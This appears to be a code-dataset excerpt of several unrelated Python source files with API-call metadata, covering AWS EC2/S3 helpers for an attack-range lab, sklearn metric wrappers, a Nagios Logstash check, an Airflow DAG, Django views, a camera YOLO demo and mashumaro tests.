repo_name
stringlengths 7
94
| repo_path
stringlengths 4
237
| repo_head_hexsha
stringlengths 40
40
| content
stringlengths 10
680k
| apis
stringlengths 2
840k
|
---|---|---|---|---|
Darkcybe/attack_range | modules/aws_service.py | b135251cc40e527e78e6e826759e421fb3834577 | import sys
import re
import boto3
from botocore.exceptions import ClientError
import uuid
import time
import yaml
import os
def get_instance_by_name(ec2_name, config):
instances = get_all_instances(config)
for instance in instances:
str = instance['Tags'][0]['Value']
if str == ec2_name:
return instance
def get_single_instance_public_ip(ec2_name, config):
instance = get_instance_by_name(ec2_name, config)
return instance['NetworkInterfaces'][0]['Association']['PublicIp']
def get_all_instances(config):
key_name = config['key_name']
region = config['region']
client = boto3.client('ec2', region_name=region)
response = client.describe_instances(
Filters=[
{
'Name': "key-name",
'Values': [key_name]
}
]
)
instances = []
for reservation in response['Reservations']:
for instance in reservation['Instances']:
if instance['State']['Name']!='terminated':
if len(instance['Tags']) > 0:
str = instance['Tags'][0]['Value']
if str.startswith(config['range_name'] + '-attack-range'):
instances.append(instance)
return instances
def get_splunk_instance_ip(config):
all_instances = get_all_instances(config)
for instance in all_instances:
instance_tag = config['range_name'] + '-attack-range-splunk-server'
if instance['Tags'][0]['Value'] == instance_tag:
return instance['NetworkInterfaces'][0]['PrivateIpAddresses'][0]['Association']['PublicIp']
def check_ec2_instance_state(ec2_name, state, config):
instance = get_instance_by_name(ec2_name, config)
if not instance:
log.error(ec2_name + ' not found as AWS EC2 instance.')
sys.exit(1)
return (instance['State']['Name'] == state)
def change_ec2_state(instances, new_state, log, config):
region = config['region']
client = boto3.client('ec2', region_name=region)
if len(instances) == 0:
log.error(ec2_name + ' not found as AWS EC2 instance.')
sys.exit(1)
if new_state == 'stopped':
for instance in instances:
if instance['State']['Name'] == 'running':
response = client.stop_instances(
InstanceIds=[instance['InstanceId']]
)
log.info('Successfully stopped instance with ID ' +
instance['InstanceId'] + ' .')
elif new_state == 'running':
for instance in instances:
if instance['State']['Name'] == 'stopped':
response = client.start_instances(
InstanceIds=[instance['InstanceId']]
)
log.info('Successfully started instance with ID ' + instance['InstanceId'] + ' .')
# def upload_file_s3_bucket(file_name, results, test_file, isArchive):
# region = config['region']
# s3_client = boto3.client('s3', region_name=region)
# if isArchive:
# response = s3_client.upload_file(file_name, 'attack-range-attack-data', str(test_file['simulation_technique'] + '/attack_data.tar.gz'))
# else:
# response = s3_client.upload_file(file_name, 'attack-range-attack-data', str(test_file['simulation_technique'] + '/attack_data.json'))
#
# with open('tmp/test_results.yml', 'w') as f:
# yaml.dump(results, f)
# response2 = s3_client.upload_file('tmp/test_results.yml', 'attack-range-automated-testing', str(test_file['simulation_technique'] + '/test_results.yml'))
# os.remove('tmp/test_results.yml')
def upload_file_s3_bucket(s3_bucket, file_path, S3_file_path, config):
region = config['region']
s3_client = boto3.client('s3', region_name=region)
response = s3_client.upload_file(file_path, s3_bucket, S3_file_path)
def upload_test_results_s3_bucket(s3_bucket, test_file, test_result_file_path, config):
region = config['region']
s3_client = boto3.client('s3', region_name=region)
response = s3_client.upload_file(test_result_file_path, s3_bucket, str(test_file['simulation_technique'] + '/test_results.yml'))
| [((25, 13, 25, 52), 'boto3.client', 'boto3.client', (), '', False, 'import boto3\n'), ((66, 13, 66, 52), 'boto3.client', 'boto3.client', (), '', False, 'import boto3\n'), ((105, 16, 105, 54), 'boto3.client', 'boto3.client', (), '', False, 'import boto3\n'), ((111, 16, 111, 54), 'boto3.client', 'boto3.client', (), '', False, 'import boto3\n'), ((59, 8, 59, 19), 'sys.exit', 'sys.exit', ({(59, 17, 59, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((70, 8, 70, 19), 'sys.exit', 'sys.exit', ({(70, 17, 70, 18): '(1)'}, {}), '(1)', False, 'import sys\n')] |
KevinMichaelSchindler/pystacknet | pystacknet/metrics.py | bb723511787be6a0828d2ec5ef141fa76b80ef84 | # -*- coding: utf-8 -*-
"""
Created on Fri Aug 31 18:33:58 2018
@author: Marios Michailidis
metrics and method to check metrics used within StackNet
"""
from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score , mean_squared_log_error #regression metrics
from sklearn.metrics import roc_auc_score, log_loss ,accuracy_score, f1_score ,matthews_corrcoef
import numpy as np
valid_regression_metrics=["rmse","mae","rmsle","r2","mape","smape"]
valid_classification_metrics=["auc","logloss","accuracy","f1","matthews"]
############ classification metrics ############
def auc(y_true, y_pred, sample_weight=None):
return roc_auc_score(y_true, y_pred, sample_weight=sample_weight)
def logloss(y_true, y_pred, sample_weight=None, labels = None):
return log_loss(y_true, y_pred, sample_weight=sample_weight, labels = labels)
def accuracy(y_true, y_pred, sample_weight=None):
return accuracy_score(y_true, y_pred, sample_weight=sample_weight)
def f1(y_true, y_pred, sample_weight=None):
return f1_score(y_true, y_pred, sample_weight=sample_weight)
def matthews(y_true, y_pred, sample_weight=None):
return matthews_corrcoef(y_true, y_pred, sample_weight=sample_weight)
############ regression metrics ############
def rmse(y_true, y_pred, sample_weight=None):
return np.sqrt(mean_squared_error(y_true, y_pred, sample_weight=sample_weight))
def mae(y_true, y_pred, sample_weight=None):
return mean_absolute_error(y_true, y_pred, sample_weight=sample_weight)
def rmsle (y_true, y_pred, sample_weight=None):
return np.sqrt(mean_squared_log_error(y_true, y_pred, sample_weight=sample_weight))
def r2(y_true, y_pred, sample_weight=None):
return r2_score(y_true, y_pred, sample_weight=sample_weight)
def mape(y_true, y_pred, sample_weight=None):
y_true = y_true.ravel()
y_pred = y_pred.ravel()
if sample_weight is not None:
sample_weight = sample_weight.ravel()
eps = 1E-15
ape = np.abs((y_true - y_pred) / (y_true + eps)) * 100
ape[y_true == 0] = 0
return np.average(ape, weights=sample_weight)
def smape(y_true, y_pred, sample_weight=None):
y_true = y_true.ravel()
y_pred = y_pred.ravel()
if sample_weight is not None:
sample_weight = sample_weight.ravel()
eps = 1E-15
sape = (np.abs(y_true - y_pred) / (0.5 * (np.abs(y_true) + np.abs(y_pred)) + eps)) * 100
sape[(y_true == 0) & (y_pred == 0)] = 0
return np.average(sape, weights=sample_weight)
"""
metric: string or class that returns a metric given (y_true, y_pred, sample_weight=None)
Curently supported metrics are "rmse","mae","rmsle","r2","mape","smape"
"""
def check_regression_metric(metric):
if type(metric) is type(None):
raise Exception ("metric cannot be None")
if isinstance(metric, str) :
if metric not in valid_regression_metrics:
raise Exception ("The regression metric has to be one of %s " % (", ".join([str(k) for k in valid_regression_metrics])))
if metric=="rmse":
return rmse,metric
elif metric=="mae":
return mae,metric
elif metric=="rmsle":
return rmsle,metric
elif metric=="r2":
return r2,metric
elif metric=="mape":
return mape,metric
elif metric=="smape":
return smape,metric
else :
raise Exception ("The metric %s is not recognised " % (metric) )
else : #customer metrics is given
try:
y_true_temp=[[1],[2],[3]]
y_pred_temp=[[2],[1],[3]]
y_true_temp=np.array(y_true_temp)
y_pred_temp=np.array(y_pred_temp)
sample_weight_temp=[1,0.5,1]
metric(y_true_temp,y_pred_temp, sample_weight=sample_weight_temp )
return metric,"custom"
except:
raise Exception ("The custom metric has to implement metric(y_true, y_pred, sample_weight=None)" )
"""
metric: string or class that returns a metric given (y_true, y_pred, sample_weight=None)
Curently supported metrics are "rmse","mae","rmsle","r2","mape","smape"
"""
def check_classification_metric(metric):
if type(metric) is type(None):
raise Exception ("metric cannot be None")
if isinstance(metric, str) :
if metric not in valid_classification_metrics:
raise Exception ("The classification metric has to be one of %s " % (", ".join([str(k) for k in valid_classification_metrics])))
if metric=="auc":
return auc,metric
elif metric=="logloss":
return logloss,metric
elif metric=="accuracy":
return accuracy,metric
elif metric=="r2":
return r2,metric
elif metric=="f1":
return f1,metric
elif metric=="matthews":
return matthews,metric
else :
raise Exception ("The metric %s is not recognised " % (metric) )
else : #customer metrics is given
try:
y_true_temp=[[1],[0],[1]]
y_pred_temp=[[0.4],[1],[0.2]]
y_true_temp=np.array(y_true_temp)
y_pred_temp=np.array(y_pred_temp)
sample_weight_temp=[1,0.5,1]
metric(y_true_temp,y_pred_temp, sample_weight=sample_weight_temp )
return metric,"custom"
except:
raise Exception ("The custom metric has to implement metric(y_true, y_pred, sample_weight=None)" )
| [((21, 11, 21, 69), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((24, 11, 24, 81), 'sklearn.metrics.log_loss', 'log_loss', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((27, 11, 27, 70), 'sklearn.metrics.accuracy_score', 'accuracy_score', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((30, 11, 30, 64), 'sklearn.metrics.f1_score', 'f1_score', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((33, 11, 33, 73), 'sklearn.metrics.matthews_corrcoef', 'matthews_corrcoef', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((41, 11, 41, 75), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (), '', False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, mean_squared_log_error\n'), ((47, 11, 47, 64), 'sklearn.metrics.r2_score', 'r2_score', (), '', False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, mean_squared_log_error\n'), ((58, 11, 58, 49), 'numpy.average', 'np.average', (), '', True, 'import numpy as np\n'), ((70, 11, 70, 50), 'numpy.average', 'np.average', (), '', True, 'import numpy as np\n'), ((38, 19, 38, 82), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (), '', False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, mean_squared_log_error\n'), ((44, 19, 44, 86), 'sklearn.metrics.mean_squared_log_error', 'mean_squared_log_error', (), '', False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, mean_squared_log_error\n'), ((56, 10, 56, 52), 'numpy.abs', 'np.abs', ({(56, 17, 56, 51): '((y_true - y_pred) / (y_true + eps))'}, {}), '((y_true - y_pred) / (y_true + eps))', True, 'import numpy as np\n'), ((68, 12, 68, 35), 'numpy.abs', 'np.abs', ({(68, 19, 68, 34): '(y_true - y_pred)'}, {}), '(y_true - y_pred)', True, 'import numpy as np\n'), ((104, 24, 104, 45), 'numpy.array', 'np.array', ({(104, 33, 104, 44): 'y_true_temp'}, {}), '(y_true_temp)', True, 'import numpy as np\n'), ((105, 24, 105, 45), 'numpy.array', 'np.array', ({(105, 33, 105, 44): 'y_pred_temp'}, {}), '(y_pred_temp)', True, 'import numpy as np\n'), ((145, 24, 145, 45), 'numpy.array', 'np.array', ({(145, 33, 145, 44): 'y_true_temp'}, {}), '(y_true_temp)', True, 'import numpy as np\n'), ((146, 24, 146, 45), 'numpy.array', 'np.array', ({(146, 33, 146, 44): 'y_pred_temp'}, {}), '(y_pred_temp)', True, 'import numpy as np\n'), ((68, 46, 68, 60), 'numpy.abs', 'np.abs', ({(68, 53, 68, 59): 'y_true'}, {}), '(y_true)', True, 'import numpy as np\n'), ((68, 63, 68, 77), 'numpy.abs', 'np.abs', ({(68, 70, 68, 76): 'y_pred'}, {}), '(y_pred)', True, 'import numpy as np\n')] |
stdevel/nagios-plugins | check_logstash_pipeline.py | 5ea0e186fa6fdd0e70681c7fed02c6d46d50bbb5 | #!/usr/bin/env python
# coding=utf-8
# vim:ts=4:sts=4:sw=4:et
#
# Author: Hari Sekhon
# Date: 2017-11-24 21:10:35 +0100 (Fri, 24 Nov 2017)
#
# https://github.com/harisekhon/nagios-plugins
#
# License: see accompanying Hari Sekhon LICENSE file
#
# If you're using my code you're welcome to connect with me on LinkedIn
# and optionally send me feedback to help steer this or other code I publish
#
# https://www.linkedin.com/in/harisekhon
#
"""
Nagios Plugin to check a Logstash pipeline is online via the Logstash Rest API
API is only available in Logstash 5.x onwards, will get connection refused on older versions
Optional thresholds apply to the number of pipeline workers
Ensure Logstash options:
--http.host should be set to 0.0.0.0 if querying remotely
--http.port should be set to the same port that you are querying via this plugin's --port switch
Tested on Logstash 5.0, 5.1, 5.2, 5.3, 5.4, 5.5, 5.6, 6.0, 6.1
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import traceback
srcdir = os.path.abspath(os.path.dirname(__file__))
libdir = os.path.join(srcdir, 'pylib')
sys.path.append(libdir)
try:
# pylint: disable=wrong-import-position
#from harisekhon.utils import log
from harisekhon.utils import ERRORS, UnknownError, support_msg_api
from harisekhon.utils import validate_chars
from harisekhon import RestNagiosPlugin
except ImportError as _:
print(traceback.format_exc(), end='')
sys.exit(4)
__author__ = 'Hari Sekhon'
__version__ = '0.6'
class CheckLogstashPipeline(RestNagiosPlugin):
def __init__(self):
# Python 2.x
super(CheckLogstashPipeline, self).__init__()
# Python 3.x
# super().__init__()
self.name = 'Logstash'
self.default_port = 9600
# could add pipeline name to end of this endpoint but error would be less good 404 Not Found
# Logstash 5.x /_node/pipeline <= use -5 switch for older Logstash
# Logstash 6.x /_node/pipelines
self.path = '/_node/pipelines'
self.auth = False
self.json = True
self.msg = 'Logstash piplines msg not defined yet'
self.pipeline = None
def add_options(self):
super(CheckLogstashPipeline, self).add_options()
self.add_opt('-i', '--pipeline', default='main', help='Pipeline to expect is configured (default: main)')
self.add_opt('-d', '--dead-letter-queue-enabled', action='store_true',
help='Check dead letter queue is enabled on pipeline (optional, only applies to Logstash 6+)')
self.add_opt('-5', '--logstash-5', action='store_true',
help='Logstash 5.x (has a slightly different API endpoint to 6.x)')
self.add_opt('-l', '--list', action='store_true', help='List pipelines and exit (only for Logstash 6+)')
self.add_thresholds()
def process_options(self):
super(CheckLogstashPipeline, self).process_options()
self.pipeline = self.get_opt('pipeline')
validate_chars(self.pipeline, 'pipeline', 'A-Za-z0-9_-')
# slightly more efficient to not return the potential list of other pipelines but the error is less informative
#self.path += '/{}'.format(self.pipeline)
if self.get_opt('logstash_5'):
if self.pipeline != 'main':
self.usage("--pipeline can only be 'main' for --logstash-5")
if self.get_opt('list'):
self.usage('can only --list pipelines for Logstash 6+')
if self.get_opt('dead_letter_queue_enabled'):
self.usage('--dead-letter-queue-enabled only available with Logstash 6+')
self.path = self.path.rstrip('s')
self.validate_thresholds(simple='lower', optional=True)
def parse_json(self, json_data):
if self.get_opt('logstash_5'):
pipeline = json_data['pipeline']
else:
pipelines = json_data['pipelines']
if self.get_opt('list'):
print('Logstash Pipelines:\n')
for pipeline in pipelines:
print(pipeline)
sys.exit(ERRORS['UNKNOWN'])
pipeline = None
if self.pipeline in pipelines:
pipeline = pipelines[self.pipeline]
self.msg = "Logstash pipeline '{}' ".format(self.pipeline)
if pipeline:
self.msg += 'exists'
if 'workers' not in pipeline:
raise UnknownError('workers field not found, Logstash may still be initializing' + \
'. If problem persists {}'.format(support_msg_api()))
workers = pipeline['workers']
self.msg += ' with {} workers'.format(workers)
self.check_thresholds(workers)
if not self.get_opt('logstash_5'):
dead_letter_queue_enabled = pipeline['dead_letter_queue_enabled']
self.msg += ', dead letter queue enabled: {}'.format(dead_letter_queue_enabled)
if self.get_opt('dead_letter_queue_enabled') and not dead_letter_queue_enabled:
self.warning()
self.msg += ' (expected True)'
batch_delay = pipeline['batch_delay']
batch_size = pipeline['batch_size']
self.msg += ', batch delay: {}, batch size: {}'.format(batch_delay, batch_size)
else:
self.critical()
self.msg += 'does not exist!'
if __name__ == '__main__':
CheckLogstashPipeline().main()
| [((43, 9, 43, 38), 'os.path.join', 'os.path.join', ({(43, 22, 43, 28): 'srcdir', (43, 30, 43, 37): '"""pylib"""'}, {}), "(srcdir, 'pylib')", False, 'import os\n'), ((44, 0, 44, 23), 'sys.path.append', 'sys.path.append', ({(44, 16, 44, 22): 'libdir'}, {}), '(libdir)', False, 'import sys\n'), ((42, 25, 42, 50), 'os.path.dirname', 'os.path.dirname', ({(42, 41, 42, 49): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((53, 4, 53, 15), 'sys.exit', 'sys.exit', ({(53, 13, 53, 14): '(4)'}, {}), '(4)', False, 'import sys\n'), ((90, 8, 90, 64), 'harisekhon.utils.validate_chars', 'validate_chars', ({(90, 23, 90, 36): 'self.pipeline', (90, 38, 90, 48): '"""pipeline"""', (90, 50, 90, 63): '"""A-Za-z0-9_-"""'}, {}), "(self.pipeline, 'pipeline', 'A-Za-z0-9_-')", False, 'from harisekhon.utils import validate_chars\n'), ((52, 10, 52, 32), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n'), ((112, 16, 112, 43), 'sys.exit', 'sys.exit', ({(112, 25, 112, 42): "ERRORS['UNKNOWN']"}, {}), "(ERRORS['UNKNOWN'])", False, 'import sys\n'), ((121, 69, 121, 86), 'harisekhon.utils.support_msg_api', 'support_msg_api', ({}, {}), '()', False, 'from harisekhon.utils import ERRORS, UnknownError, support_msg_api\n')] |
rvacaru/airflow-training-skeleton | dags/mailsdag.py | 45fc6a8938d055b98c62c85b7c8085cb7d6f23ba | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Example DAG demonstrating the usage of the BashOperator."""
from datetime import timedelta
import datetime
import airflow
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python_operator import BranchPythonOperator
args = {
'owner': 'Airflow',
'start_date': airflow.utils.dates.days_ago(14),
}
dag = DAG(
dag_id='exercise_weekday',
default_args=args,
schedule_interval='0 0 * * *',
dagrun_timeout=timedelta(minutes=60),
)
dummy_last = DummyOperator(
task_id='run_this_last',
dag=dag,
trigger_rule='one_success',
)
def print_weekday(**context):
day = context["execution_date"].strftime('%a')
print(day)
return day
weekday_task = PythonOperator(
task_id='weekday_task',
python_callable=print_weekday,
provide_context=True,
dag=dag,
)
# optimize with try exept
weekday_person = {
"Mon": "bob",
"Tue": "joe",
"Thu": "joe",
}
def define_oncall(**context):
day = print_weekday(**context)
try:
task_id = weekday_person[day]
except KeyError:
return "ali"
return task_id
branch_task = BranchPythonOperator(
task_id='branch_task',
python_callable=define_oncall,
provide_context=True,
dag=dag,
)
tasks = ["bob", "joe", "ali"]
for p in tasks:
taski = DummyOperator(
task_id=p,
dag=dag,
)
branch_task >> taski
taski >> dummy_last
weekday_task >> branch_task
| [((44, 13, 48, 1), 'airflow.operators.dummy_operator.DummyOperator', 'DummyOperator', (), '', False, 'from airflow.operators.dummy_operator import DummyOperator\n'), ((55, 15, 60, 1), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', (), '', False, 'from airflow.operators.python_operator import PythonOperator\n'), ((78, 14, 83, 1), 'airflow.operators.python_operator.BranchPythonOperator', 'BranchPythonOperator', (), '', False, 'from airflow.operators.python_operator import BranchPythonOperator\n'), ((34, 18, 34, 50), 'airflow.utils.dates.days_ago', 'airflow.utils.dates.days_ago', ({(34, 47, 34, 49): '(14)'}, {}), '(14)', False, 'import airflow\n'), ((88, 12, 91, 5), 'airflow.operators.dummy_operator.DummyOperator', 'DummyOperator', (), '', False, 'from airflow.operators.dummy_operator import DummyOperator\n'), ((41, 19, 41, 40), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n')] |
speedplane/python-compat-runtime | appengine-compat/exported_appengine_sdk/google/storage/speckle/proto/jdbc_type.py | 743ade7e1350c790c4aaa48dd2c0893d06d80cee | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Python equivalent of jdbc_type.h.
Python definition of the JDBC type constant values defined in Java class
java.sql.Types. Since the values don't fall into the range allowed by
a protocol buffer enum, we use Python constants instead.
If you update this, update jdbc_type.py also.
"""
BIT = -7
TINYINT = -6
SMALLINT = 5
INTEGER = 4
BIGINT = -5
FLOAT = 6
REAL = 7
DOUBLE = 8
NUMERIC = 2
DECIMAL = 3
CHAR = 1
VARCHAR = 12
LONGVARCHAR = -1
DATE = 91
TIME = 92
TIMESTAMP = 93
BINARY = -2
VARBINARY = -3
LONGVARBINARY = -4
NULL = 0
OTHER = 1111
JAVA_OBJECT = 2000
DISTINCT = 2001
STRUCT = 2002
ARRAY = 2003
BLOB = 2004
CLOB = 2005
REF = 2006
DATALINK = 70
BOOLEAN = 16
ROWID = -8
NCHAR = -15
NVARCHAR = -9
LONGNVARCHAR = -16
NCLOB = 2011
SQLXML = 2009
| [] |
osabogal10/GestiREDBackend | GestiRED/views.py | 99aa3b01bd67910cc0f96751c88d0f4e83763392 | from django.http import HttpResponse
from django.core.mail import send_mail
import json
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from GestiRED.models import User
from GestiRED.models import QualityControl, Phase, Resource, ResourceType,PhaseType
from django.core import serializers
from django.db.models import Q
# Create your views here.
def index(request):
return HttpResponse("GestiRED app UP")
@csrf_exempt
def quality_review_notification(request):
if request.method == 'POST':
data = json.loads(request.body)
qualityControl_id = data["qualityControl_id"]
resource_name = data["resource_name"]
responsible_name = data["responsible_name"]
qualityControl = QualityControl.objects.get(pk=qualityControl_id)
user = qualityControl.responsible
send_mail('Revision Calidad',
'Recurso: ' + resource_name + '\n Observaciones: Se ha asignado para control de calidad a: ' + responsible_name,
'[email protected]',
[user.email],
fail_silently=False)
res = {"status": "Ok", "Content:": "Email enviado"}
return HttpResponse(json.dumps(res), content_type="application/json")
@csrf_exempt
def resources_filters(request):
qs_json={}
if request.method == 'GET':
phaseType = request.GET.get('phaseType')
if phaseType != None : phaseType= phaseType.split(',')
resourceType = request.GET.get('resourceType')
if resourceType != None : resourceType = resourceType.split(',')
responsible = request.GET.get('responsible')
if responsible != None: responsible = responsible.split(',')
labels = request.GET.get('labels')
my_dict = {'phase__phaseType__in':phaseType,
'resourceType__in': resourceType,
'responsibles__in':responsible,
'labels__icontains': labels} # Your dict with fields
or_condition = Q()
for key, value in my_dict.items():
if value != None:
or_condition.add(Q(**{key: value}), Q.AND)
lp = set()
lp=Resource.objects.filter(or_condition).all().distinct()
data = list([res.json() for res in lp])
qs_json =json.dumps({'objects':data})
return HttpResponse( qs_json, content_type='application/json')
| [((14, 11, 14, 42), 'django.http.HttpResponse', 'HttpResponse', ({(14, 24, 14, 41): '"""GestiRED app UP"""'}, {}), "('GestiRED app UP')", False, 'from django.http import HttpResponse\n'), ((64, 11, 64, 66), 'django.http.HttpResponse', 'HttpResponse', (), '', False, 'from django.http import HttpResponse\n'), ((20, 15, 20, 39), 'json.loads', 'json.loads', ({(20, 26, 20, 38): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((24, 25, 24, 73), 'GestiRED.models.QualityControl.objects.get', 'QualityControl.objects.get', (), '', False, 'from GestiRED.models import QualityControl, Phase, Resource, ResourceType, PhaseType\n'), ((27, 8, 31, 38), 'django.core.mail.send_mail', 'send_mail', (), '', False, 'from django.core.mail import send_mail\n'), ((34, 24, 34, 39), 'json.dumps', 'json.dumps', ({(34, 35, 34, 38): 'res'}, {}), '(res)', False, 'import json\n'), ((56, 23, 56, 26), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q\n'), ((63, 17, 63, 45), 'json.dumps', 'json.dumps', ({(63, 28, 63, 44): "{'objects': data}"}, {}), "({'objects': data})", False, 'import json\n'), ((59, 33, 59, 50), 'django.db.models.Q', 'Q', ({}, {}), '(**{key: value})', False, 'from django.db.models import Q\n'), ((61, 11, 61, 48), 'GestiRED.models.Resource.objects.filter', 'Resource.objects.filter', ({(61, 35, 61, 47): 'or_condition'}, {}), '(or_condition)', False, 'from GestiRED.models import QualityControl, Phase, Resource, ResourceType, PhaseType\n')] |
sipeed/python3-maix | ext_modules/_maix_nn/example/yolo2_camera.py | 9ced31b8f1c1e4ef93b6a57bbfced27ae9e3361e |
from maix import nn
from PIL import Image, ImageDraw, ImageFont
from maix import display, camera
import time
from maix.nn import decoder
def draw_rectangle_with_title(draw, box, disp_str, bg_color=(255, 0, 0, 255), font_color=(255, 255, 255, 255)):
# draw = ImageDraw.Draw(img)
font = ImageFont.load_default()
font_w, font_h = font.getsize(disp_str)
draw.rectangle((box[0], box[1], box[0] + box[2], box[1] + box[3]), fill=None, outline=bg_color, width=2)
draw.rectangle((box[0], box[1] - font_h, box[0] + font_w, box[1]), fill=bg_color)
draw.text((box[0], box[1] - font_h), disp_str, fill=font_color, font=font)
camera.config(size=(224, 224))
model = {
"param": "/root/models/yolo2_face_awnn.param",
"bin": "/root/models/yolo2_face_awnn.bin"
}
options = {
"model_type": "awnn",
"inputs": {
"input0": (224, 224, 3)
},
"outputs": {
"output0": (7, 7, (1+4+1)*5)
},
"mean": [127.5, 127.5, 127.5],
"norm": [0.0078125, 0.0078125, 0.0078125],
}
print("-- load model:", model)
m = nn.load(model, opt=options)
print("-- load ok")
print("-- read image")
w = options["inputs"]["input0"][1]
h = options["inputs"]["input0"][0]
# # img.show()
print("-- read image ok")
labels = ["person"]
anchors = [1.19, 1.98, 2.79, 4.59, 4.53, 8.92, 8.06, 5.29, 10.32, 10.65]
yolo2_decoder = decoder.Yolo2(len(labels), anchors, net_in_size=(w, h), net_out_size=(7, 7))
while 1:
img = camera.capture()
if not img:
time.sleep(0.01)
continue
t = time.time()
out = m.forward(img, quantize=True, layout="hwc")
print("-- forward: ", time.time() - t )
t = time.time()
boxes, probs = yolo2_decoder.run(out, nms=0.3, threshold=0.5, img_size=(240, 240))
print("-- decode: ", time.time() - t )
t = time.time()
for i, box in enumerate(boxes):
class_id = probs[i][0]
prob = probs[i][1][class_id]
disp_str = "{}:{:.2f}%".format(labels[class_id], prob*100)
draw_rectangle_with_title(display.get_draw(), box, disp_str)
print("-- draw: ", time.time() - t )
t = time.time()
display.show()
print("-- show: ", time.time() - t )
| [((21, 0, 21, 30), 'maix.camera.config', 'camera.config', (), '', False, 'from maix import display, camera\n'), ((40, 4, 40, 31), 'maix.nn.load', 'nn.load', (), '', False, 'from maix import nn\n'), ((13, 11, 13, 35), 'PIL.ImageFont.load_default', 'ImageFont.load_default', ({}, {}), '()', False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((55, 10, 55, 26), 'maix.camera.capture', 'camera.capture', ({}, {}), '()', False, 'from maix import display, camera\n'), ((59, 8, 59, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((63, 8, 63, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((67, 8, 67, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((75, 8, 75, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((76, 4, 76, 18), 'maix.display.show', 'display.show', ({}, {}), '()', False, 'from maix import display, camera\n'), ((57, 8, 57, 24), 'time.sleep', 'time.sleep', ({(57, 19, 57, 23): '(0.01)'}, {}), '(0.01)', False, 'import time\n'), ((61, 26, 61, 37), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((65, 25, 65, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((72, 34, 72, 52), 'maix.display.get_draw', 'display.get_draw', ({}, {}), '()', False, 'from maix import display, camera\n'), ((73, 23, 73, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((77, 23, 77, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
Fatal1ty/mashumaro | tests/test_metadata_options.py | f32acf98f7cc7cdf638b921fe3fde96bef4fbefb | from dataclasses import dataclass, field
from datetime import date, datetime, time, timezone
from pathlib import Path
from typing import Any, Dict, Optional, Union
import ciso8601
import pytest
from mashumaro import DataClassDictMixin
from mashumaro.exceptions import UnserializableField
from mashumaro.types import SerializationStrategy
from .entities import (
MutableString,
MyList,
ThirdPartyType,
TypedDictRequiredKeys,
)
def test_ciso8601_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": "ciso8601"})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_ciso8601_date_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: date = field(metadata={"deserialize": "ciso8601"})
should_be = DataClass(x=date(2021, 1, 2))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_ciso8601_time_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: time = field(metadata={"deserialize": "ciso8601"})
should_be = DataClass(x=time(3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_pendulum_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": "pendulum"})
